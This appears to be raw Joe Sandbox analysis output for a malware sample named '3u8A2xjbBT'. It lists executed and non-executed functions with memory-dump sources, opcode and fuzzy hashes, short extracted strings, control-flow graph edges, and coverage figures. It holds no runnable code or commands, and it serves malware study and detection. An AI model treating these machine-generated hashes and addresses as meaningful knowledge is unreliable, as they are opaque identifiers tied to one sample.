                                      • Opcode ID: 938343f0666b72cf78428553fa5694b3f5b24f6f124128ee342599f338cf3818
                                      • Instruction ID: 7af8fe6de880bdca2fe9811de53ebd9dc3662fbc9bed27b56a935d2b7b260673
                                      • Opcode Fuzzy Hash: 938343f0666b72cf78428553fa5694b3f5b24f6f124128ee342599f338cf3818
                                      • Instruction Fuzzy Hash: C3D06770D45308EBCB40EBBC944579DBBF4AB05201F5045A59949D2240E6705A549795

                                      Non-executed Functions

                                      Function 05832D40 Relevance: .1, Instructions: 119COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713454907.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5830000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 52607a03f09bd93803abdee7a078c50fb46c21e90a728aab12caf364f629c19a
                                      • Instruction ID: 86179156622d5504e985b56c4e334d53664c8c2729cd60d2f62e3a92cdff5a2f
                                      • Opcode Fuzzy Hash: 52607a03f09bd93803abdee7a078c50fb46c21e90a728aab12caf364f629c19a
                                      • Instruction Fuzzy Hash: 254171397007058FC720DB28D481E66B7E6FF89754725C9AAE89ACB755DB30EC06CB90
                                      Function 053051FA Relevance: 6.5, Strings: 5, Instructions: 285COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: /q$"\t$(Tt$^\t$$q
                                      • API String ID: 0-3152500879
                                      • Opcode ID: c9c573b359d311c0715ec76864806a66e49a3e71845c760a200a046acfb1795f
                                      • Instruction ID: 10d275af2a2610af399b7c47a2358638fe7708ff76fab46136ad3a6d637cc834
                                      • Opcode Fuzzy Hash: c9c573b359d311c0715ec76864806a66e49a3e71845c760a200a046acfb1795f
                                      • Instruction Fuzzy Hash: 5EB11D34B002088FDB54EBA9D594B6EBBE2BFC8600B548429D40ADB395DF74ED028B91

                                      Execution Graph

                                      Execution Coverage:11.4%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:3
                                      Total number of Limit Nodes:0
                                      execution_graph 24516 182afe0 24517 182b02d VirtualProtect 24516->24517 24518 182b098 24517->24518

                                      Executed Functions

                                      Function 059AC1C0 Relevance: 11.8, Strings: 9, Instructions: 520COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 59ac1c0-59ac244 9 59ac24a-59ac2e8 call 59a86f0 call 59abe08 call 59ac130 call 59abdc0 0->9 10 59ac2ef-59ac31b 0->10 9->10 14 59ac38c-59ac395 10->14 16 59ac31d-59ac320 14->16 17 59ac397-59ac3a1 14->17 19 59ac32c-59ac32f 16->19 20 59ac322-59ac32a 16->20 21 59ac3a3-59ac3ad 17->21 22 59ac3c1 17->22 23 59ac332-59ac33b 19->23 20->23 24 59ac3b8-59ac3bf 21->24 25 59ac3af-59ac3b6 21->25 26 59ac3c8-59ac557 call 59ac178 call 59abdc0 call 59abe08 22->26 28 59ac341-59ac364 call 59abe50 call 59ac0e8 23->28 29 59ac607-59ac62f 23->29 24->26 25->26 141 59ac559-59ac55f 26->141 142 59ac594-59ac606 26->142 28->29 42 59ac36a-59ac373 28->42 35 59ac631-59ac653 29->35 36 59ac655-59ac665 29->36 47 59ac668-59ac671 35->47 36->47 157 59ac375 call 59ac1b3 42->157 158 59ac375 call 59ac1c0 42->158 48 59ac693-59ac69b 47->48 49 59ac673-59ac679 47->49 55 59ac67b-59ac691 49->55 56 59ac69c-59ac6d9 49->56 51 59ac37b-59ac37d 57 59ac388-59ac389 51->57 58 59ac37f-59ac381 51->58 55->48 55->49 70 59ac6df-59ac75b 56->70 71 59ac760-59ac77f 56->71 57->14 58->57 113 59ac843-59ac84a 70->113 80 59ac781-59ac7c1 71->80 81 59ac7c6-59ac7d1 71->81 80->113 88 59ac7f2 81->88 89 59ac7d3-59ac7d9 81->89 96 59ac7fb-59ac80e 88->96 89->88 92 59ac7db-59ac7de 89->92 92->88 94 59ac7e0-59ac7e3 92->94 94->88 98 59ac7e5-59ac7e8 94->98 96->113 98->88 100 59ac7ea-59ac7f0 98->100 100->88 104 59ac810-59ac812 100->104 109 59ac81b-59ac81d 104->109 110 59ac814-59ac817 104->110 109->113 111 59ac819-59ac841 110->111 112 59ac81f-59ac83f 110->112 111->113 112->113 141->29 143 59ac565-59ac56f 141->143 143->29 145 59ac575-59ac583 143->145 148 59ac58e-59ac592 145->148 149 59ac585-59ac587 145->149 148->141 148->142 149->148 157->51 158->51
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713696648.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_59a0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: /q$"\t$"\t$"\t$"\t$"\t$(Tt$^\t$$q
                                      • API String ID: 0-1602154313
                                      • Opcode ID: af6fb1b64fedae6c3e4091269f905df068453c4534ee2860267c6ee206e73583
                                      • Instruction ID: 04b04e2146190397576906c572b6e305b4a2a39375c26f67042a983b402e20a3
                                      • Opcode Fuzzy Hash: af6fb1b64fedae6c3e4091269f905df068453c4534ee2860267c6ee206e73583
                                      • Instruction Fuzzy Hash: 53124E35B002059FDB18DF69C594A6EBBF7FF88200B148929E50ADB395DF34ED428B91
                                      Function 0A49FAF0 Relevance: 1.5, Strings: 1, Instructions: 279COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3715200213.000000000A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_a490000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: su9
                                      • API String ID: 0-4099337347
                                      • Opcode ID: 1a5a35814c1d1f37d328bfb4291ad17ada3db4bce7b73985bbc1a1ffb5e3a80e
                                      • Instruction ID: 19f430d4effc49aeb634b1d28ce4f9471fe0189f50d18b56d58e1faaf92b82bc
                                      • Opcode Fuzzy Hash: 1a5a35814c1d1f37d328bfb4291ad17ada3db4bce7b73985bbc1a1ffb5e3a80e
                                      • Instruction Fuzzy Hash: CCC10278E05218DFCB14CFA9D994A9DBBB2FB89311F10806AD419EB268D7309946CF14
                                      Function 0A49FB00 Relevance: 1.5, Strings: 1, Instructions: 278COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3715200213.000000000A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_a490000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: su9
                                      • API String ID: 0-4099337347
                                      • Opcode ID: 82ee5def971e0f3f2e7c838680f7e2cd5d585cf05fdab32b691103cd3ae30f43
                                      • Instruction ID: e6e4cda34dc7ac196e7f49cc9ed477caaa2c8ee554998d01623706c145e867e4
                                      • Opcode Fuzzy Hash: 82ee5def971e0f3f2e7c838680f7e2cd5d585cf05fdab32b691103cd3ae30f43
                                      • Instruction Fuzzy Hash: 0EC1F278E05218DFCB14CFA9D994A9DBBB2FB89311F10906AD419FB368D7309946CF14
                                      Function 05D34C11 Relevance: 1.5, Strings: 1, Instructions: 202COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713789392.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_5d30000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: VQfE
                                      • API String ID: 0-2538451675
                                      • Opcode ID: 5f905511739f2a85032d281052f16beae244eea563989f0d029a4dd38a7a34dd
                                      • Instruction ID: 6f0973145b6f5d165c0e3c8ae145823a555fd4b74d8bbf7c3afe17d42369bfbc
                                      • Opcode Fuzzy Hash: 5f905511739f2a85032d281052f16beae244eea563989f0d029a4dd38a7a34dd
                                      • Instruction Fuzzy Hash: 8B91B374E04219CFDB04CFA5C989AAEFBB2FF89310F14802AD415AB364DB389942CF50
                                      Function 05D34C20 Relevance: 1.5, Strings: 1, Instructions: 202COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713789392.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_5d30000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: VQfE
                                      • API String ID: 0-2538451675
                                      • Opcode ID: 86e91264cbff990ee1bf9258c6c45f9c6471b483b5e41f295e716f82027cd6bd
                                      • Instruction ID: f57b1ca4616c87563275991eb2c7ec3345c01e487b7aeab57139966a2339d8e1
                                      • Opcode Fuzzy Hash: 86e91264cbff990ee1bf9258c6c45f9c6471b483b5e41f295e716f82027cd6bd
                                      • Instruction Fuzzy Hash: 2E91A474E04219CFDB04CFA5C985AAEFBB2FF89310F14812AD915AB364DB389942CF54
                                      Function 05D353B4 Relevance: .6, Instructions: 564COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713789392.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_5d30000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8395ce15101ad128d82b3dcd2e1f8a5e1b3bcc355f495794d2ac19a40e3e63fa
                                      • Instruction ID: 8920e4e5a093f77189090125ee560a34acd12e3d0ee7a4c6a42262f8cc8de38c
                                      • Opcode Fuzzy Hash: 8395ce15101ad128d82b3dcd2e1f8a5e1b3bcc355f495794d2ac19a40e3e63fa
                                      • Instruction Fuzzy Hash: C9322974E15219DFCB14CFA5E985A9DFBB2FF89200F10966AE449AB325DB30D942CF10
                                      Function 05D32470 Relevance: .4, Instructions: 442COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713789392.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_5d30000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4669d714ae617ed2824718e2f2cabdc525f6546ef55d011b3e335c4d00c382b8
                                      • Instruction ID: 5de3eaa98f7baf15322d9cf6e8fb70d79462fc1ac479dc53c3abd4989722749e
                                      • Opcode Fuzzy Hash: 4669d714ae617ed2824718e2f2cabdc525f6546ef55d011b3e335c4d00c382b8
                                      • Instruction Fuzzy Hash: 00121474E05219CFCB14CFA9C981A9DBBF2BF89300F1495AAD549BB365DB309A81CF14
                                      Function 05D32460 Relevance: .4, Instructions: 432COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713789392.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_5d30000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 95e4aff1b2183ca5a845dafa17c55312fd6d1a2892839cae29fced9be32dd9ee
                                      • Instruction ID: 2f669ff550e7ccbd5e23716685447d0b26902e90d2c2bb4612cecf9d11e541ad
                                      • Opcode Fuzzy Hash: 95e4aff1b2183ca5a845dafa17c55312fd6d1a2892839cae29fced9be32dd9ee
                                      • Instruction Fuzzy Hash: 3D121474E05219CFDB14CFA9C981A9DBBF2BF89300F1495AAD549BB354EB309A81CF14
                                      Function 0A493D48 Relevance: .4, Instructions: 412COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3715200213.000000000A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_a490000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1fae5e1f38abdb3682c0eef575a8364b1f480952bacbb98688d59ae216c1a436
                                      • Instruction ID: 2d3dfd2eedde2fa69ad484de6b16d4168989791ec453da0ac7542d023e5ed362
                                      • Opcode Fuzzy Hash: 1fae5e1f38abdb3682c0eef575a8364b1f480952bacbb98688d59ae216c1a436
                                      • Instruction Fuzzy Hash: 2202F374D00228CFDF64CFA8C885B9EBBB1BF49340F1085AAD419B7250EB749A96CF55
                                      Function 05D31420 Relevance: .4, Instructions: 404COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713789392.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_5d30000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 13dc89317a1ef29e856af97ee7ce0df85780fc38983ab765de7efb14ea127214
                                      • Instruction ID: 90250b3f69c02c60c43570233b3ae802ec905db332a6a4c06d3f169c23d076af
                                      • Opcode Fuzzy Hash: 13dc89317a1ef29e856af97ee7ce0df85780fc38983ab765de7efb14ea127214
                                      • Instruction Fuzzy Hash: 1BF1F474E05219CFDB54CFA9C941A9EBBF2EB89300F24946AC40ABB354DB309E56CF14
                                      Function 05D31410 Relevance: .4, Instructions: 393COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713789392.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_5d30000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c039a5ad6db882a2fb8878d8d33a9a3553c6ace80aa7d0a9f425137170959b23
                                      • Instruction ID: c81fc969039a9540f4ea46f2fd9148553e89a6bc8142ac81317ba5e11dc8fc39
                                      • Opcode Fuzzy Hash: c039a5ad6db882a2fb8878d8d33a9a3553c6ace80aa7d0a9f425137170959b23
                                      • Instruction Fuzzy Hash: 87F1E374E05219CFDB54CFA9C981A9EBBF2EB89300F24946AC419BB354DB309E56CF14
                                      Function 0A494B78 Relevance: .4, Instructions: 387COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3715200213.000000000A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_a490000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f53525cbfcdc7244d459b1bb7164788fef7dc062ad91f7ff582969b831e8c882
                                      • Instruction ID: bedaefc64d2f47682475e1c4d496fa4b5e942591fee99d4b00129b98b0d06ec0
                                      • Opcode Fuzzy Hash: f53525cbfcdc7244d459b1bb7164788fef7dc062ad91f7ff582969b831e8c882
                                      • Instruction Fuzzy Hash: D2F1E374D00229CFDF64CFA8C885B9EBBB1BF49300F1085AAD419A7390EB749A95CF55
                                      Function 0A4937F8 Relevance: .4, Instructions: 354COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3715200213.000000000A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_a490000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 06d187254af0a681cf4a349d97f5852495d6b007f6857157afa35907e93966c9
                                      • Instruction ID: 7f158ce9e78fd551398c43ace897ae19416c57576f3d677fdd74081edf035b7a
                                      • Opcode Fuzzy Hash: 06d187254af0a681cf4a349d97f5852495d6b007f6857157afa35907e93966c9
                                      • Instruction Fuzzy Hash: B4E1F674D00218CFEF64DFA9C884BDEBBB1BF49300F1085AAD419AB250DB74A995CF55
                                      Function 05D31D40 Relevance: .2, Instructions: 241COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713789392.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_5d30000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: aa507f7df53663e5440c1df40df0cd4f5887bf965de58dbfd02df0eaaa3346da
                                      • Instruction ID: 5f9c8fd8e0e65f6626ccf0ed88cd920eb98c8ebe35aadab40b66de97f0dcef38
                                      • Opcode Fuzzy Hash: aa507f7df53663e5440c1df40df0cd4f5887bf965de58dbfd02df0eaaa3346da
                                      • Instruction Fuzzy Hash: B1A10474E05219DFCB14CFE9D981AADBBB2FB89310F24946AD40AB7354DB309985CF18
                                      Function 05D31D30 Relevance: .2, Instructions: 240COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713789392.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_5d30000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b87220a6e3d693ab208615ef0e434fe1e69f0d9829693dfec6da178a327be9cc
                                      • Instruction ID: 27574a40c93df2b61c59e1091267adf5ae1fdd1179b2bb1c2b26f9d39dd4a743
                                      • Opcode Fuzzy Hash: b87220a6e3d693ab208615ef0e434fe1e69f0d9829693dfec6da178a327be9cc
                                      • Instruction Fuzzy Hash: 9AA11474E0521ADFCB14CFE9D981A9DBBB2FB89310F24942AD406B7354DB349A85CF18
                                      Function 05D34240 Relevance: .2, Instructions: 222COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713789392.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_5d30000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 356d94b56140aa224a745698839693f3054b7c00633d8156cca505ae509f008e
                                      • Instruction ID: c9e211e9245c34b1cfee0af506fdcc601055aa6b9f70519ff5506f6b06c20cc1
                                      • Opcode Fuzzy Hash: 356d94b56140aa224a745698839693f3054b7c00633d8156cca505ae509f008e
                                      • Instruction Fuzzy Hash: 1191F274E14208DFCB18CFAAD985A9DFBF2BF89300F10D12AD45AAB218DB349941CF54
                                      Function 05D34230 Relevance: .2, Instructions: 221COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713789392.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_5d30000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d9e5bb607a6bd1654176bf3f326d6b67eff6e755cc6cf4bfec0ddebb869c5d3f
                                      • Instruction ID: d3636dbe474a57fb31d0168a1c597dfb3949e158bf0fb9fc0091da2565b11e66
                                      • Opcode Fuzzy Hash: d9e5bb607a6bd1654176bf3f326d6b67eff6e755cc6cf4bfec0ddebb869c5d3f
                                      • Instruction Fuzzy Hash: B0910274E05208CBCB18CFAAD985A9DFBF2FF89300F14D16AD45AAB218DB349941CF54
                                      Function 05D3280F Relevance: .2, Instructions: 207COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713789392.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_5d30000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e717f7e47ceb61b39132bc6374bf254a00b8ed53bbf66bd35a3ad40c9134975b
                                      • Instruction ID: 83df4fbca0a8b142161bee4e11eafe0dee9d67860f6ca3c2aa37f22f9a913b9a
                                      • Opcode Fuzzy Hash: e717f7e47ceb61b39132bc6374bf254a00b8ed53bbf66bd35a3ad40c9134975b
                                      • Instruction Fuzzy Hash: 6B910374E152198FCB14CFA9D981A9DFBF2FF88310F14D5A6E549A7314EB309A418F14
                                      Function 05D338CA Relevance: .2, Instructions: 153COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713789392.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_5d30000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3eda4f12483b5e45801c0b899c453bafc637ced573f5a0fe26ed09f5ade397c4
                                      • Instruction ID: 5235707caf3d8da94ebc9f50d058e5dc2b32379075a4a1221e2965c3cfccaef1
                                      • Opcode Fuzzy Hash: 3eda4f12483b5e45801c0b899c453bafc637ced573f5a0fe26ed09f5ade397c4
                                      • Instruction Fuzzy Hash: 2D516E74E1A219DFCB04CFA5D981A9DFBB2FF89310F109556E409AB314DB30A946CF54
                                      Function 0A49E3A0 Relevance: .1, Instructions: 120COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3715200213.000000000A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_a490000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9ddfa5c10f0fa322b628a1f0386e1af7bd729d04d1d47b4f0739454589cdb50b
                                      • Instruction ID: 80278ebdac61bdaf8bc4963bca89f9026b41c55f4953670434f2650dcf210418
                                      • Opcode Fuzzy Hash: 9ddfa5c10f0fa322b628a1f0386e1af7bd729d04d1d47b4f0739454589cdb50b
                                      • Instruction Fuzzy Hash: CC4165B8E0120ADFCF54CFA9D4452AEBFF2EF89300F24952AD525A3250E7344A528F90
                                      Function 0A49E3DF Relevance: .1, Instructions: 107COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3715200213.000000000A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_a490000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 961edbe740322539fb6b876f0f66f22635405076ad8aa469d150a319e51a550d
                                      • Instruction ID: fd3f6cf28a87b04f6961d6658bf7f890628e6294757db45f43177c40e883bcc1
                                      • Opcode Fuzzy Hash: 961edbe740322539fb6b876f0f66f22635405076ad8aa469d150a319e51a550d
                                      • Instruction Fuzzy Hash: 8F4138B8E0120ADFDF04CFA9D5456AEFFF2EF89300F24942AD525A3254E7345A528F91
                                      Function 0A49E3F0 Relevance: .1, Instructions: 105COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3715200213.000000000A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_a490000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f52a0c08b0d5c1ed27bb6ca3f37ef243ff2c4251830679e03d432fbe1ed78c0f
                                      • Instruction ID: 44f52be2cd0f27ce3003dd801d6e011c1d52c2ef754c0a2b1ab3ed0b7aed9307
                                      • Opcode Fuzzy Hash: f52a0c08b0d5c1ed27bb6ca3f37ef243ff2c4251830679e03d432fbe1ed78c0f
                                      • Instruction Fuzzy Hash: 494156B4E0120ADFCF04CFA9D9456AEFFF2AF89300F24942AD525A3250E7345A428F90
                                      Function 05D32A25 Relevance: .1, Instructions: 79COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713789392.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_5d30000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fab7f3fe4890fc83413b207fb2711639291388ccb76ece0a1a2d74dcfbb2c571
                                      • Instruction ID: 45448933ce9cb45ef1dd52593697deff6eb19ad9b92e13cd8bde663cb3d10bb2
                                      • Opcode Fuzzy Hash: fab7f3fe4890fc83413b207fb2711639291388ccb76ece0a1a2d74dcfbb2c571
                                      • Instruction Fuzzy Hash: 6C313874E151198BCB14CFAEC981A9DFBF2FF88310F14D4AAD149F7228DA309A418F18
                                      Function 0A497B80 Relevance: 9.0, Strings: 7, Instructions: 230COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 159 a497b80-a497bf6 call a4982c0 222 a497bf9 call a499fa8 159->222 223 a497bf9 call a49a030 159->223 170 a497bff-a497d33 220 a497d35 call 59a3eba 170->220 221 a497d35 call 59a3ec8 170->221 193 a497d3b-a497d6b 224 a497d6d call 59a63d8 193->224 225 a497d6d call 59a63c8 193->225 197 a497d73-a497e3a 226 a497e44 call 59a6ea0 197->226 227 a497e44 call 59a6e71 197->227 214 a497e4a-a497e61 217 a497e69-a497e78 214->217 220->193 221->193 222->170 223->170 224->197 225->197 226->214 227->214
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3715200213.000000000A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_a490000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $OD$<8D$<ND$XAD$dbD$p^D$^D
                                      • API String ID: 0-2711120537
                                      • Opcode ID: 95c6597326b0d65cf2a8079b78a6584bf179b119ae4d632ddb7f6ca3052f14b4
                                      • Instruction ID: 021e85f35d0ad7aaea5cad5796d3908760f3c1ab1e6ea29a1ffe83789ad13e3b
                                      • Opcode Fuzzy Hash: 95c6597326b0d65cf2a8079b78a6584bf179b119ae4d632ddb7f6ca3052f14b4
                                      • Instruction Fuzzy Hash: 6AA189786007028FD715EF64C48495ABBB2FF883117108A99E45A8F376CB34FC4ACB91
                                      Function 0A49B968 Relevance: 5.1, Strings: 4, Instructions: 124COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 228 a49b968-a49bae3 call a49c3f0 call a49c807 266 a49bae5 call a49cbe8 228->266 267 a49bae5 call a49cbc0 228->267 260 a49baeb-a49bb12 266->260 267->260
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3715200213.000000000A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_a490000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: <8D$dbD$dbD$D
                                      • API String ID: 0-1307421687
                                      • Opcode ID: b62590d2be1e3f5b4bae0547f7e48fe6477937ac319dd944d2ed73422e236602
                                      • Instruction ID: 89c004fd798e53649a25626159e6cd6e1a2c32c77717d34bc53dcec4cbde91b0
                                      • Opcode Fuzzy Hash: b62590d2be1e3f5b4bae0547f7e48fe6477937ac319dd944d2ed73422e236602
                                      • Instruction Fuzzy Hash: 0F4199382007019FE325AF70D45466ABBF2FF99601B408A2DD4468B695CB39BC0ACB91
                                      Function 0A49B978 Relevance: 5.1, Strings: 4, Instructions: 118COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 268 a49b978-a49bae3 call a49c3f0 call a49c807 306 a49bae5 call a49cbe8 268->306 307 a49bae5 call a49cbc0 268->307 300 a49baeb-a49bb12 306->300 307->300
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3715200213.000000000A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_a490000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: <8D$dbD$dbD$D
                                      • API String ID: 0-1307421687
